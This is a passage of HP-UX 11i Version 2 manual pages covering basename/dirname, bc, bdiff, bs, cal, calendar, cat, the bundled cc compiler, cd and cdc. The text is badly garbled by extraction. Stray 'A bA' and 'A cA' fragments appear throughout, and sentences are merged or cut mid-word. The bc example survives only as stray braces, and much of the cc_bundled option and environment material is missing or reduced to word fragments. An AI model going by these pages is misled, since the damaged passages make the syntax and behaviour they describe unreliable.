LC_CTYPE determines the interpretation of string and, in the case of basename, suffix, basename and dirname behave as if all internationalization variables are set to "C".
See environ (5).
EXAMPLES
The following shell script, invoked with the argument /usr/src/cmd/cat.c, compiles the named file
and moves the output to a file named cat in the current directory:
cc $1
mv a.out ‘basename $1 .c‘
The following example sets the shell variable NAME to /usr/src/cmd:
NAME=‘dirname /usr/src/cmd/cat.c‘
RETURNS
basename and dirname return one of the following values:
0 Successful completion.
1 Incorrect number of command-line arguments.
SEE ALSO
expr(1), sh(1).
STANDARDS CONFORMANCE
basename: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
dirname: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−43
bc(1) bc(1)
NAME
bc - arbitrary-precision arithmetic language
SYNOPSIS
bc [-c] [-l] [ file ... ]
DESCRIPTION
bc is an interactive processor for a language that resembles C but provides unlimited-precision arith-
metic. It takes input from any files given, then reads the standard input.
Options:
A bA bc recognizes the following command-line options:
-c Compile only. bc is actually a preprocessor for dc which bc invokes automatically
(see dc(1)). Specifying -c prevents invoking dc, and sends the dc input to standard out-
put.
-l causes an arbitrary-precision math library to be predefined. As a side effect, the scale
factor is set.
Program Syntax:
L a single letter in the range a through z;
E expression;
S statement;
R relational expression.
Names:
Names include:
simple variables: L
array elements: L [ E ]
The words ibase,obase, and scale
stacks: L
Other Operands
Other operands include:
Arbitrarily long numbers with optional sign and decimal point.
(E)
sqrt ( E )
length ( E ) number of significant decimal digits
scale ( E ) number of digits right of decimal point
L ( E , ... , E )
Strings of ASCII characters enclosed in quotes ( " ).
Arithmetic Operators:
Arithmetic operators yield an E as a result and include:
+ - * / % ˆ ( % is remainder (not mod, see below); ˆ is power).
++ -- (prefix and append; apply to names)
= += -= *= /= %= ˆ=
Relational Operators
Relational operators yield an R when used as E op E:
== <= >= != < >
Section 1−−44 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
bc(1) bc(1)
Statements
E
{ S ; ... ; S }
if ( R ) S
while ( R ) S
for ( E ; R ; E ) S
null statement
break
quit
Function Definitions:
define L ( L ,..., L ) {
auto L, ... , L
A bA
S; ... S
return ( E )
}
EXAMPLES
Define
}
}
Print approximate values of the exponential function of the first ten integers.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−45
bc(1) bc(1)
WARNINGS
There are currently no && (AND) or || (OR) comparisons.
The for statement must have all three expressions.
quit is interpreted when read, not when executed.
bc’s parser is not robust in the face of input errors. Some simple expression such as 2+2 helps get it back
into phase.
The assignment operators: =+ =- =* =/ =% and =ˆ are obsolete. Any occurences of these
A bA operators cause a syntax error with the exception of =- which is interpreted as = followed by a unary
minus.
Neither entire arrays nor functions can be passed as function parameters.
FILES
/usr/bin/dc desk calculator executable program
/usr/lib/lib.b mathematical library
SEE ALSO
bs(1), dc(1).
bc tutorial in Number Processing Users Guide
STANDARDS CONFORMANCE
bc: XPG4, POSIX.2
Section 1−−46 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
bdiff(1) bdiff(1)
NAME
bdiff - diff for large files
SYNOPSIS
bdiff file1 file2 [ n ] [-s]
DESCRIPTION
bdiff compares two files and produces output identical to what would be produced by diff (see
diff(1)), specifying changes that must be made to make the files identical. bdiff is designed for han-
dling files that are too large for diff, but it can be used on files of any length.
bdiff processes files as follows:
• Ignore lines common to the beginning of both files.
A bA
• Split the remainder of each file into n-line segments, then execute diff on corresponding seg-
ments. The default value of n is 3500.
Command-Line Arguments
bdiff recognizes the following command-line arguments:
file1
file2 Names of two files to be compared by bdiff. If file1 or file2 (but not both) is -, stan-
dard input is used instead.
n If a numeric value is present as the third argument, the files are divided into n-line
segments before processing by diff. Default value for n is 3500. This option is useful
when 3500-line segments are too large for processing by diff.
-s Silent option suppresses diagnostic printing by bdiff, but does not suppress possible
error messages from diff). If the n and -s arguments are both used, the n argument
must precede the -s option on the command line or it will not be properly recognized.diff behaves as if all internationaliza-
tion variables are set to "C". See environ (5).
DIAGNOSTICS
both files standard input (bd2)
Standard input was specified for both files. Only one file can be specified as standard input.
non-numeric limit (bd4)
A non-numeric value was specified for the n (third) argument.
EXAMPLES
Find differences between two large files: file1 and file2, and place the result in a new file named
diffs_1.2.
bdiff file1 file2 >diffs_1.2
Do the same, but limit file length to 1400 lines; suppress error messages:
bdiff file1 file2 1400 -s >diffs_1.2
WARNINGS
bdiff produces output identical to output from diff, and makes the necessary line-number corrections
so that the output looks like it was processed by diff. However, depending on where the files are split,
bdiff may or may not find a fully minimized set of file differences.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−47
bdiff(1) bdiff(1)
FILES
/tmp/bd??????
SEE ALSO
diff(1).
A bA
Section 1−−48 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
bs(1) bs(1)
NAME
bs - a compiler/interpreter for modest-sized programs
SYNOPSIS
bs [ file [ args ] ]
DESCRIPTION
bs is a remote descendant of BASIC and SNOBOL4 with some C language added. bs is designed for pro-
gramming tasks where program development time is as important as the resulting speed of execution.
Formalities of data declaration and file/process manipulation are minimized. Line-at-a-time debugging,
the trace and dump statements, and useful run-time error messages all simplify program testing.
Furthermore, incomplete programs can be debugged; inner functions can be tested before outer functions
have been written, and vice versa.
A bA
If file is specified on the command-line, it is used for input before any input is taken from the keyboard.
By default, statements read from file are compiled for later execution. Likewise, statements entered from
the keyboard are normally executed immediately (see compile and execute below). Unless the final
operation is assignment, the result of an immediate expression statement is printed.
bs programs are made up of input lines. If the last character on a line is a \, the line is continued. bs
accepts lines of the following form:
statement
label statement
A label is a name (see below) followed by a colon. A label and a variable can have the same name.
A bs statement is either an expression or a keyword followed by zero or more expressions. Some key-
words (clear, compile, !, execute, include, ibase, obase, and run) are always executed as
they are compiled.
Statement Syntax:
expression The expression is executed for its side effects (value, assignment, or function call). The
details of expressions follow the description of statement types below.
break break exits from the innermost for/while loop.
clear Clears the symbol table and compiled statements. clear is executed immediately.
compile [expression]
Succeeding statements are compiled (overrides the immediate execution default). The
optional expression is evaluated and used as a file name for further input. A clear is
associated with this latter case. compile is executed immediately.
continue continue transfers to the loop-continuation of the current for/while loop.
dump [name] The name and current value of every non-local variable is printed. Optionally, only the
named variable is reported. After an error or interrupt, the number of the last statement
is displayed. The user-function trace is displayed after an error or stop that occurred
in a function.
edit A call is made to the editor selected by the EDITOR environment variable if it is present,
or ed(1) if EDITOR is undefined or null. If the file argument is present on the command
line, file is passed to the editor as the file to edit (otherwise no file name is used). Upon
exiting the editor, a compile statement (and associated clear) is executed giving that
file name as its argument.
exit [expression]
Return to system level. The expression is returned as process status.
execute Change to immediate execution mode (an interrupt has a similar effect). This statement
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−49
bs(1) bs(1)
Section 1−−50 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
bs(1) bs(1)
Expression Syntax:
name A name is used to specify a variable. Names are composed of a letter (uppercase or
lowercase) optionally followed by letters and digits. Only the first six characters of a
name are significant. Except for names declared in fun statements, all names are global
to the program. Names can take on numeric (double float) values, string values, or can
be associated with input/output (see the built-in function open( ) below).
name ( [expression [ , expression] ... ] )
Functions can be called by a name followed by the arguments in parentheses separated
by commas. Except for built-in functions (listed below), the name must be defined with a
fun statement. Arguments to functions are passed by value. If the function is undefined,
the call history to the call of that function is printed, and a request for a return value (as
an expression) is made. The result of that expression is taken to be the result of the
undefined function. This permits debugging programs where not all the functions are yet
defined. The value is read from the current input file.
name [ expression [ , expression ] ... ]
This syntax is used to reference either arrays or tables (see built-in table functions
below). For arrays, each expression is truncated to an integer and used as a specifier for
the name. The resulting array reference is syntactically identical to a name; a[1,2] is
the same as a[1][2]. The truncated expressions are restricted to values between 0 and
32 767.
number A number is used to represent a constant value. A number is written in Fortran style,
and contains digits, an optional decimal point, and possibly a scale factor consisting of an
e followed by a possibly signed exponent.
string Character strings are delimited by " characters. The \ escape character allows the dou-
ble quote (\"), new-line (\n), carriage return (\r), backspace (\b), and tab (\t) charac-
ters to appear in a string. Otherwise, \ stands for itself.
( expression ) Parentheses are used to alter the normal order of evaluation.
( expression , expression [ , expression ... ] ) [ expression ]
The bracketed expression is used as a subscript to select a comma-separated expression
from the parenthesized list. List elements are numbered from the left, starting at zero.
The expression:
( False, True )[ a == b ]
has the value True if the comparison is true.
? expression The interrogation operator tests for the success of the expression rather than its value.
At the moment, it is useful for testing end-of-file (see examples in the Programming Tips
section below), the result of the eval built-in function, and for checking the return from
user-written functions (see freturn). An interrogation ‘‘trap’’ (end-of-file, etc.) causes
an immediate transfer to the most recent interrogation, possibly skipping assignment
statements or intervening function levels.
- expression The result is the negation of the expression.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−51
bs(1) bs(1)
++ name Increments the value of the variable (or array reference). The result is the new value.
- - name Decrements the value of the variable. The result is the new value.
!expression The logical negation of the expression. Watch out for the shell escape command.
expression operator expression Common functions of two arguments are abbreviated by the two
arguments separated by an operator denoting the function. Except for the assignment,
concatenation, and relational operators, both operands are converted to numeric form
before the function is applied.
Built-in Functions:
Dealing with arguments
arg(i ) is the value of the i-th actual parameter on the current level of function call. At level
zero, arg returns the i-th command-line argument (arg(0) returns bs).
narg( ) returns the number of arguments passed. At level zero, the command argument count is
returned.
Mathematical
abs(x ) is the absolute value of x.
atan(x ) is the arctangent of x. Its value is between −π/2 and π/2.
ceil(x ) returns the smallest integer not less than x.
cos(x ) is the cosine of x (radians).
exp(x ) is the exponential function of x.
floor(x ) returns the largest integer not greater than x.
log(x ) is the natural logarithm of x.
rand( ) is a uniformly distributed random number between zero and one.
sin(x ) is the sine of x (radians).
sqrt(x ) is the square root of x.
String operations
size(s ) the size (length in bytes) of s is returned.
format(f , a )
returns the formatted value of a. f is assumed to be a format specification in the style of
printf (3S). Only the % ... f, % ... e, and % ... s types are safe. Since it is not
Section 1−−52 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
bs(1) bs(1)
always possible to know whether a is a number or a string when the format call is
coded, coercing a to the type required by f by either adding zero (for e or f format) or
concatenating (_) the null string (for s format) should be considered.
index(x , y ) returns the number of the first position in x that any of the characters from y matches.
No match yields zero.
trans(s , f, t )
Translates characters of the source s from matching characters in f to a character in the
same position in t . Source characters that do not appear in f are copied to the result. If
the string f is longer than t , source characters that match in the excess portion of f do not
appear in the result.
substr(s , start, width ) A bA
returns the sub-string of s defined by the start ing position and width .
match(string , pattern )
mstring(n ) The pattern is a regular expression according to the Basic Regular Expression definition
(see regexp (5)). mstring returns the n-th (1 <= n <= 10) substring of the subject that
occurred between pairs of the pattern symbols \( and \) for the most recent call to
match . To succeed, patterns must match the beginning of the string (as if all patterns
began with ˆ). The function returns the number of characters matched. For example:
match("a123ab123", ".*\([a-z]\)") == 6
mstring(1) == "b"
File handling
open(name , file, function )
close(name )
name argument must be a bs variable name (passed as a string). For the open, the file
argument can be:
1. a 0 (zero), 1, or 2 representing standard input, output, or error output, respec-
tively;
2. a string representing a file name; or
3. a string beginning with an ! representing a command to be executed (via sh
-c). The function argument must be either r (read), w (write), W (write
without new-line), or a (append). After a close, name reverts to being an
ordinary variable. If name was a pipe, a wait() is executed before the close
completes (see wait (2)). The bs exit command does not do such a wait. The
initial associations are:
open("get", 0, "r")
open("put", 1, "w")
open("puterr", 2, "w")
Examples are given in the following section.
access(s , m )
executes access() (see access (2)).
ftype(s ) returns a single character file type indication: f for regular file, p for FIFO (i.e., named
pipe), d for directory, b for block special, or c for character special.
Tables
table(name , size )
A table in bs is an associatively accessed, single-dimension array. ‘‘Subscripts’’ ord-
erly progression of key values). Where the item function accesses values, the key
function accesses the ‘‘subscript’’ of the previous item call. It fails (or in the absence of
an interrogate operator, returns null) if there was no valid subscript for the previ-
ous item call. The name argument should not be quoted. Since exact table sizes are
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−53
bs(1) bs
A bA elements in the table. Null is, however, a legal ‘‘subscript’’.
iskey(name , word )
iskey tests whether the key word exists in the table name and returns one for true, zero
for false.
Section 1−−54 Hewlett-Packard Company −6− HP-UX 11i Version 2: August 2003
bs(1) bs(1)
EXTERNAL INFLUENCES
Environment Variables A bA
LC_COLLATE determines the collating sequence used in evaluating regular expressions.
LC_CTYPE determines the characters matched by character class expressions in regular expressions.s behaves as if all internationalization variables are set to "C".
See environ (5).
EXAMPLES
Using bs as a calculator ($ is the shell prompt):
$ bs
# Distance (inches) light travels in a nanosecond.
186000 * 5280 * 12 / 1e9
11.78496
...
# Compound interest (6% for 5 years on $1,000).
int = .06 / 4
bal = 1000
for i = 1 5*4 bal = bal + bal*int
bal - 1000
346.855007
...
exit
The outline of a typical bs program:
# initialize things:
var1 = 1
open("read", "infile", "r")
...
# compute:
while ?(str = read)
...
# clean up:
close("read")
...
# last statement executed (exit or stop):
exit
# last input line:
run
Input/Output examples:
# Copy file oldfile to file newfile.
open("read", "oldfile", "r")
open("write", "newfile", "w")
HP-UX 11i Version 2: August 2003 −7− Hewlett-Packard Company Section 1−−55
bs(1) bs(1)
...
while ?(write = read)
...
# close "read" and "write":
close("read")
close("write")
# Pipe between commands.
open("ls", "!ls *", "r")
open("pr", "!pr -2 -h ’List’", "w")
while ?(pr = ls) ...
...
A bA # be sure to close (wait for) these:
close("ls")
close("pr")
WARNINGS
The graphics mode (plot ...) is not particularly useful unless the tplot command is available on your
system.
bs is not tolerant of some errors. For example, mistyping a fun declaration is difficult to correct
because a new definition cannot be made without doing a clear. The best solution in such a case is to
start by using the edit command.
SEE ALSO
ed(1), sh(1), access(2), printf(3S), stdio(3S), lang(5), regexp(5).
See Section (3M) for a further description of the mathematical functions.
pow() is used for exponentiation — see exp (3M));
bs uses the Standard I/O package.
Section 1−−56 Hewlett-Packard Company −8− HP-UX 11i Version 2: August 2003
cal(1) cal(1)
NAME
cal - print calendar
SYNOPSIS
cal [ [ month ] year ]
DESCRIPTION
cal prints a calendar for the specified year. If a month is also specified, a calendar just for that month is
printed. If neither is specified, a calendar for the present month is printed. year can be between 1 and
9999. month is a decimal number between 1 and 12. The calendar produced is a Gregorian calendar.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the locale to use for the locale categories when both LC_ALL and the corresponding A cA_TIME determines the format and contents of the calendar.
TZ determines the timezone used to calculate the value of the current month.
If any internationalization variable contains an invalid setting, cal behaves as if all internationalization
variables are set to "C". See environ (5).
EXAMPLES
The command:
cal 9 1850
prints the calendar for September, 1850 on the screen as follows:
September 1850
S M Tu W Th F S
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
However, for XPG4 the output looks like below:
Sep 1850
Sun Mon Tue Wed Thu Fri Sat
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
WARNINGS
The year is always considered to start in January even though this is historically naive.
Beware that cal 83 refers to the early Christian era, not the 20th century.
STANDARDS CONFORMANCE
cal: SVID2, SVID3, XPG2, XPG3, XPG4
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−57
calendar(1) calendar(1)
NAME
calendar - reminder service
SYNOPSIS
calendar [-]
DESCRIPTION
calendar consults the file calendar in the current directory and prints out lines containing today’s or
tomorrow’s date anywhere in the line. On weekends, ‘‘tomorrow’’ extends through Monday.
When a - command-line argument is present, calendar searches for the file calendar in each
user’s home directory, and sends any positive results to the user by mail (see mail (1)). Normally this is
done daily in the early morning hours under the control of cron (see cron (1M)). When invoked by
A cA cron, calendar reads the first line in the calendar file to determine the user’s environment.
Language-dependent information such as spelling and date format (described below) are determined by
the user-specified LANG statement in the calendar file. This statement should be of the form
LANG=language where language is a valid language name (see lang (5)). If this line is not in the
calendar file, the action described in the EXTERNAL INFLUENCES Environment Variable section is
taken.
calendar is concerned with two fields: month and day. A month field can be expressed in three
different formats: a string representing the name of the month (either fully spelled out or abbreviated), a
numeric month, or an asterisk (representing any month). If the month is expressed as a string represent-
ing the name of the month, the first character can be either upper-case or lower-case; other characters
must be lower-case. The spelling of a month name should match the string returned by calling
nl_langinfo() (see nl_langinfo (3C)). The day field is a numeric value for the day of the month.
Month-Day Formats
If the month field is a string, it can be followed by zero or more blanks. If the month field is numeric, it
must be followed by either a slash (/) or a hyphen (-). If the month field is an asterisk (*), it must be fol-
lowed by a slash (/). The day field can be followed immediately by a blank or non-digit character.
Day-Month Formats
The day field is expressed as a numeral. What follows the day field is determined by the format of the
month. If the month field is a string, the day field must be followed by zero or one dot (.) followed by
zero or more blanks. If the month field is a numeral, the day field must be followed by either a slash (/)
or a hyphen (-). If the month field is an asterisk, the day field must be followed by a slash (/).
EXTERNAL INFLUENCES
Environment Variables
LC_TIME determines the format and contents of date and time strings when no LANG statement is
specified in the calendar file.
LANG determines the language in which messages are displayed.
If, calendar behaves as if all internationalization variables are set to "C". See environ (5).
EXAMPLES
The following calendar file illustrates several formats recognized by calendar :
LANG=en_US.roman8
Friday, May 29th: group coffee meeting
meeting with Boss on June 3.
3/30/87 - quarter end review
4-26 Management council meeting at 1:00 pm
It is first of the month ( */1 ); status report due.
In the following calendar file, dates are expressed according to European English usage:
Section 1−−58 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
calendar(1) calendar(1)
LANG=en_GB.roman8
On 20 Jan. code review
Jim’s birthday is on the 3. February
30/3/87 - quarter end review
26-4 Management council meeting at 1:00 pm
It is first of the month ( 1/* ); status report due.
WARNINGS
To get reminder service, either your calendar must be public information or you must run calendar
from your personal crontab file, independent of any calendar - run systemwide. Note that if you
run calendar yourself, the calendar file need not reside in your home directory.
calendar’s extended idea of ‘‘tomorrow’’ does not account for holidays.
This command is likely to be withdrawn from X/Open standards. Applications using this command might A cA
not be portable to other vendors’ platforms.
AUTHOR
calendar was developed by AT&T and HP.
FILES
calendar
/tmp/cal*
/usr/lbin/calprog to figure out today’s and tomorrow’s dates
/usr/bin/crontab
/etc/passwd
SEE ALSO
cron(1M), nl_langinfo(3C), mail(1), environ(5).
STANDARDS CONFORMANCE
calendar: SVID2, SVID3, XPG2, XPG3
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−59
cat(1) cat(1)
NAME
cat - concatenate, copy, and print files
SYNOPSIS
cat [-benrstuv] file ...
DESCRIPTION
cat reads each file in sequence and writes it on the standard output. Thus:
cat file
prints file on the default standard output device;
cat file1 file2 > file3
A cA concatenates file1 and file2 , and places the result in file3 .
If - is appears as a file argument, cat uses standard input. To combine standard input and other files,
use a combination of - and file arguments.
Options
cat recognizes the following options:
-b Omit line numbers from blank lines when -n option is specified. If this option is specified, the
-n option is automatically selected.
-e Print a $ character at the end of each line (prior to the new-line). If this option is specified,
the -v option is automatically selected.
-n Display output lines preceded by line numbers, numbered sequentially from 1.
-r Replace multiple consecutive empty lines with one empty line, so that there is never more than
one empty line between lines containing characters.
-s Silent option. cat suppresses error messages about non-existent files, identical input and
output, and write errors. Normally, input and output files cannot have identical names unless
the file is a special file.
-t Print each tab character as ˆI and form feed character as ˆL. If this option is specified, the
-v option is automatically selected.
-u Do not buffer output (handle character-by-character). Normally, output is buffered.
-v Cause non-printing characters (with the exception of tabs, new-lines and form-feeds) to be
printed visibly. Control characters are printed using the form ˆX (Ctrl-X), and the DEL char-
acter (octal 0177) is printed as ˆ? (see ascii (5)). Single-byte control characters whose most
significant bit is set, are printed using the form M-ˆx, where x is the character specified by the
seven low order bits. All other non-printing characters are printed as M-x, where x is the
character specified by the seven low order bits. This option is influenced by the LC_CTYPE
environment variable and its corresponding code set.
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, cat60 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
cat(1) cat(1)
RETURN VALUE
Exit values are:
0 Successful completion.
>0 Error condition occurred.
EXAMPLES
To create a zero-length file, use any of the following:
cat /dev/null > file
cp /dev/null file
touch file A cA
The following prints ˆI for all the occurrences of tab character in file1
cat -t file1
To suppress error messages about files that do not exist, use:
cat -s file1 file2 file3 > file
If file2 does not exist, the above command concatenates file1 and file3 without reporting the error on file2 .
The result is the same if -s option is not used, except that cat displays the error message.
To view non-printable characters in file2 , use:
cat -v file2
WARNINGS
Command formats such as
cat file1 file2 > file1
overwrites the data in file1 before the concatenation begins, thus destroying the file. Therefore, be care-
ful when using shell special characters.
SEE ALSO
cp(1), more(1), pg(1), pr(1), rmnl(1), ssp(1).
STANDARDS CONFORMANCE
cat: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−61
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
NAME
cc - bundled C compiler
SYNOPSIS
cc [options ] files
DESCRIPTION
This manual page describes the Bundled C compiler. cc invokes the HP-UX bundled C compiler. C
source code is compiled directly to object code.
The command uses the ctcom (Itanium(R)-based systems) or ccom (PA-RISC, Precision Architecture)
compiler for preprocessing, syntax and type checking, as well as for code generation.
cc accepts several types of arguments as files :
A cA (PA-RISC) or libx .a in an attempt to resolve currently unresolved
external references. Because a library is searched when its name is encountered, placement
of a -l is significant. If a file contains an unresolved external reference, the library contain-
ing.
Other Suffixes
All other arguments, such as those names ending with .o, .a, or .so are taken to be relo-
catable parame-
ters tem-
porary files, overriding the default directory /var/tmp.
Options).
Section 1−−62 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−63
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
Section 1−−64 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
Options can-
not assure that location zero acts as if it was initialized to zero or is locked at zero, the hardware should
act as if the -z flag is always set.
A cA
EXTERNAL INFLUENCES
Environment Variables com-
ponents.
DIAGNOSTICS
The diagnostics produced by the compiler itself are intended to be self-explanatory. Occasional messages
may be produced by the assembler or the link editor.
If any errors occur before cc is completed, a non-zero value is returned. Otherwise, zero is returned.
DEPENDENCIES
file.c C input file
file.i previously preprocessed cc input file
file.o object file
file.so shared library, created with -b on Itanium-based systems
file.sl shared library, created with -b on PA-RISC
a.out linked executable output file
/var/tmp/* temporary files used by the compiler (Itanium-based systems)
/var/tmp/ctm* temporary files used by the compiler (PA-RISC)
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−65
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
/usr/ccs/bin/cc C driver
/usr/ccs/bin/cc_bundled C driver
/usr/ccs/lbin/ctcom C Compiler (Itanium-based systems)
/usr/ccs/lbin/ccom C Compiler (PA-RISC)
/usr/ccs/lbin/cpp preprocessor, to assemble .s files
/usr/lib/nls/msg/$LANG/aCC.cat
C compiler message catalog (Itanium-based systems)
/usr/lib/nls/msg/$LANG/cc.cat
C compiler message catalog (PA-RISC)
A cA /usr/ccs/bin/as
/usr/ccs/bin/ld
assembler, as (1)
link editor, ld(1)
/usr/ccs/lib/crt0.o Runtime startup (PA-RISC)
/usr/include Standard directory for #include files
Other Libraries
Sec-
tion (3). (PA-RISC)
/usr/lib/libc.sl Standard C library (shared version), see HP-UX Reference Sec-
tion (3). (PA-RISC)
/usr/lib/hpux32/libm.a Math Library (Itanium-based system)
/usr/lib/hpux64/libm.a Math Library (Itanium-based systems)
/usr/lib/libm.a Math Library (PA-RISC)
/usr/lib/hpux32/libdld.so Dynamic loader library (Itanium-based systems)
/usr/lib/hpux64/libdld.so Dynamic loader library (Itanium-based systems)
/usr/lib/libdld.sl Dynamic loader library (PA-RISC)
/usr/lib/hpux32/dld.so Dynamic loader (Itanium-based systems)
/usr/lib/hpux64/dld.so Dynamic loader (Itanium-based systems)
/usr/lib/dld.so Dynamic loader (PA-RISC)
SEE ALSO
Online help
The online help can be displayed using a default HTML browser, or you can invoke your own HTML
browser with the URL file:/opt/ansic/html/$LANG/guide/index.htm (Itanium-based sys-
tems) or file:/opt/ansic/html/guide/$LANG/index.htm (PA-RISC)
Other topics available are: Compiler Pragmas, Floating Installation and Implementation Defined aspects
of the compiler.
Information is also available on the web at:
Section 1−−66 Hewlett-Packard Company −5− HP-UX 11i Version 2: August 2003
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
System Tools
as (1) translate assembly code to machine code
cpp (1) invoke the C language preprocessor
cc(1) C compiler
ld(1) invoke the link editor
Miscellaneous
strip (1) strip symbol and line number information from an object file
crt0 (3) execution startup routine
end(3C) symbol of the last locations in program
exit (2) termination of a process
HP-UX 11i Version 2: August 2003 −6− Hewlett-Packard Company Section 1−−67
cd(1) cd(1)
NAME
cd - change working directory
SYNOPSIS
cd [ directory ]
DESCRIPTION
If directory is not specified, the value of shell parameter HOME is used as the new working directory. If
directory specifies a complete path starting with /, ., or .., directory becomes the new working direc-
tory. If neither case applies, cd tries to find the designated directory relative to one of the paths
specified by the CDPATH shell variable. CDPATH has the same syntax as, and similar semantics to, the
PATH shell variable. cd must have execute (search) permission in directory .
A cA cd exists only as a shell built-in command because a new process is created whenever a command is exe-
cuted, making cd useless if written and processed as a normal system command. Moreover, different
shells provide different implementations of cd as a built-in utility. Features of cd as described here
may not be supported by all the shells. Refer to individual shell manual entries for differences.
If cd is called in a subshell or a separate utility execution environment such as:
find . -type d -exec cd {}; -exec foo {};
(which invokes foo on accessible directories) cd does not affect the current directory of the caller’s
environment. Another usage of cd as a stand-alone command is to obtain the exit status of the com-
mand.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
Environment Variables
The following environment variables affect the execution of cd:
HOME The name of the home directory, used when no directory operand is specified.
CDPATH is set to the first
matching directory found. An empty string in place of a directory pathname
represents the current directory. If CDPATH is not set, it is treated as if it was an
empty string.
EXAMPLES
Change the current working directory to the HOME directory from any location in the file system:
cd
Change to new current working directory foo residing in the current directory:
cd foo
or
cd ./foo
Change to directory foobar residing in the current directory’s parent directory:
cd ../foobar
Change to the directory whose absolute pathname is /usr/local/lib/work.files:
cd /usr/local/lib/work.files
Change to the directory proj1/schedule/staffing/proposals relative to home directory:
cd $HOME/proj1/schedule/staffing/proposals
RETURN VALUE
Upon completion, cd exits with one of the following values:
0 The directory was successfully changed.
Section 1−−68 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
cd(1) cd(1)
SEE ALSO
csh(1), pwd(1), ksh(1), sh-posix(1), sh(1), chdir(2).
STANDARDS CONFORMANCE
cd: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
A cA
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−69
cdc(1) cdc(1)
NAME
cdc - change the delta commentary of an SCCS delta
SYNOPSIS
cdc -r SID [-m[ mrlist ] ] [-y[ comment ] ] files
DESCRIPTION
The cdc command changes the delta commentary, for the SID specified by the -r option, of each
named SCCS file.
Delta commentary is defined to be the Modification Request (MR) and comment information normally
specified via the delta (1) command (-m and -y options).
If a directory is named, cdc behaves as if each file in the directory were specified as a named file, except
A cA that non-SCCS files (last component of the path name does not begin with s.) and unreadable files are
silently ignored. If a name of - is given, the standard input is read (see WARNINGS); each line of the
standard input is taken to be the name of an SCCS file to be processed.
Options
Arguments to cdc, which can appear in any order, consist of option arguments and file names.
All of the described option arguments apply independently to each named file:
-rSID Used to specify the S CCS IDentification (SID) string of a delta for which the delta
commentary is to be changed.
-m[mrlist] If the SCCS file has the v option set (see admin (1)), a list of MR numbers to be
added and/or deleted in the delta commentary of the SID specified by the -r option
may be supplied. A null MR list has no effect.
MR entries are added to the list of MRs in the same manner as that of delta (1). To
delete an MR, precede the MR number with the character ! (see EXAMPLES). If the
MR to be deleted is currently in the list of MRs, it is removed and changed into a
‘‘comment’’ line. A list of all deleted MRs is placed in the comment section of the
delta commentary and preceded by a comment line stating that they were deleted. -y option).
MRs in a list are separated by blanks and/or tab characters. An unescaped new-line
character terminates the MRs list.
Note that if the v option has a value (see admin (1)), it is treated as the name of a
program (or shell procedure) that validates the correctness of the MR numbers. If a
non-zero exit status is returned from the MR number validation program, cdc ter-
minates and the delta commentary remains unchanged.
-y[comment] Arbitrary text used to replace the comment or comment s already existing for the
delta specified by the -r option. Previous comments are kept and preceded by a
comment line stating that they were changed. A null comment has no effect.
If -y is not specified and the standard input is a terminal, the prompt comments?
is issued on the standard output before standard input is read; if standard input is
not a terminal, no prompt is issued. An unescaped new-line character terminates
the comment text.
The exact permissions necessary to modify the SCCS file are documented in get (1). Simply stated, they
are either:
• If you made the delta, you can change its delta commentary, or
• If you own the file and directory, you can modify the delta commentary.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed.
Section 1−−70 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
cdc(1) cdc(1)
DIAGNOSTICS
Use sccshelp (1) for explanations.
EXAMPLES
Add bl78-12345 and bl79-00001 to the MR list, remove bl77-54321 from the MR list, and add the
comment trouble to delta 1.6 of s.file:
cdc -r1.6 -m"bl78-12345 !bl77-54321 bl79-00001" -ytrouble s.file
The following does the same thing:
cdc -r1.6 s.file
MRs? !bl77-54321 bl78-12345 bl79-00001 A cA
WARNINGS
If SCCS file names are supplied to the cdc command via the standard input (- on the command line), the
-m and -y options must also be used.
FILES
x-file See delta (1).
z-file See delta (1).
SEE ALSO
admin(1), delta(1), get(1), sccshelp(1), prs(1), sccsfile(4), rcsfile(4), acl(5), rcsintro(5).
